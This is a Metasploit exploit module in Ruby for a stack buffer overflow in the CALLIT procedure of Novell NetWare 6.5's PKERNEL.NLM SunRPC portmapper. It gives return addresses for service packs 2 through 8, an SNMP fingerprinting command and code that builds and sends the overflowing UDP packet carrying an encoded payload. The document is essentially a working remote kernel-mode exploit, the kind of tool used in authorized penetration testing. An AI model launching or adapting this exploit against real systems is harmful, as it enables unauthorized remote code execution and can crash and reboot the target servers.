1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::Udp
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow',
16
        'Description' => %q{
17
          This module exploits a stack buffer overflow in the NetWare PKERNEL.NLM driver's CALLIT procedure.
18
          PKERNEL.NLM is installed by default on all NetWare servers to support NFS.
19
          The PKERNEL.NLM module runs in kernel mode so a failed exploit attempt can
20
          cause the operating system to reboot.
21
        },
22
        'Author' => [ 'pahtzo', ],
23
        'License' => MSF_LICENSE,
24
        'References' => [
25
          # There is no CVE for this vulnerability
26
          [ 'BID', '36564' ],
27
          [ 'OSVDB', '58447' ],
28
          [ 'ZDI', '09-067' ],
29
        ],
30
        'Privileged' => true,
31
        'Payload' => {
32
          'Space' => 2020
33
        },
34
        'Platform' => 'netware',
35
        'Targets' => [
36
          # NetWare SP and PKERNEL.NLM version can be found in SNMP:
37
          # snmpwalk -Os -c public -v 1 [target hostname] | egrep -i "sysdescr|pkernel.nlm"
38
          # sysDescr.0 = STRING: Novell NetWare 5.70.08  October 3, 2008
39
          # hrSWRunName.1191394992 = STRING: "PKERNEL.NLM  v15.01  (20081014)"
40
          [ 'NetWare 6.5 SP2', { 'Ret' => 0xb2329b98 } ], # push esp - ret (libc.nlm)
41
          [ 'NetWare 6.5 SP3', { 'Ret' => 0xb234a268 } ], # push esp - ret (libc.nlm)
42
          [ 'NetWare 6.5 SP4', { 'Ret' => 0xbabc286c } ], # push esp - ret (libc.nlm)
43
          [ 'NetWare 6.5 SP5', { 'Ret' => 0xbabc9c3c } ], # push esp - ret (libc.nlm)
44
          [ 'NetWare 6.5 SP6', { 'Ret' => 0x823c835c } ], # push esp - ret (libc.nlm)
45
          [ 'NetWare 6.5 SP7', { 'Ret' => 0x823c83fc } ], # push esp - ret (libc.nlm)
46
          [ 'NetWare 6.5 SP8', { 'Ret' => 0x823C870C } ], # push esp - ret (libc.nlm)
47
        ],
48
        'Notes' => {
49
          'Stability' => [ CRASH_OS_RESTARTS ],
50
          'SideEffects' => [ IOC_IN_LOGS ],
51
          'Reliability' => [ UNRELIABLE_SESSION ]
52
        },
53
        'DisclosureDate' => '2009-09-30'
54
      )
55
    )
56

57
    register_options([Opt::RPORT(111)])
58
  end
59

60
  def exploit
61
    connect_udp
62

63
    buf = [rand(0xffffffff)].pack('N') # XID
64
    buf << [0].pack('N')                # Message Type: Call (0)
65
    buf << [2].pack('N')                # RPC Version: 2
66
    buf << [100000].pack('N')           # Program: Portmap (100000)
67
    buf << [2].pack('N')                # Program Version: 2
68
    buf << [5].pack('N')                # Procedure: CALLIT (5)
69
    buf << [0].pack('N')                # Credentials AUTH_NULL (0)
70
    buf << [0].pack('N')                # Length: 0
71
    buf << [0].pack('N')                # Verifier AUTH_NULL (0)
72
    buf << [0].pack('N')                # Length: 0
73
    buf << [0].pack('N')                # Program: Unknown (0)
74
    buf << [1].pack('N')                # Version: 1
75
    buf << [1].pack('N')                # Procedure: proc-1 (1)
76
    buf << [4097].pack('N')             # Arguments: <DATA> length: 4097
77

78
    buf << make_nops(2072)              # fill to ret
79
    buf << [target.ret].pack('V')       # addr. of push esp - ret
80
    buf << payload.encoded              #
81

82
    # print_status("payload space #{payload_space()}...")
83
    # print_status("payload len #{payload.encoded.length}...")
84
    # print_status("total buf len #{buf.length}...")
85

86
    print_status("Trying target #{target.name}...")
87

88
    udp_sock.put(buf)
89
    handler
90
    disconnect_udp
91
  end
92
end
93

94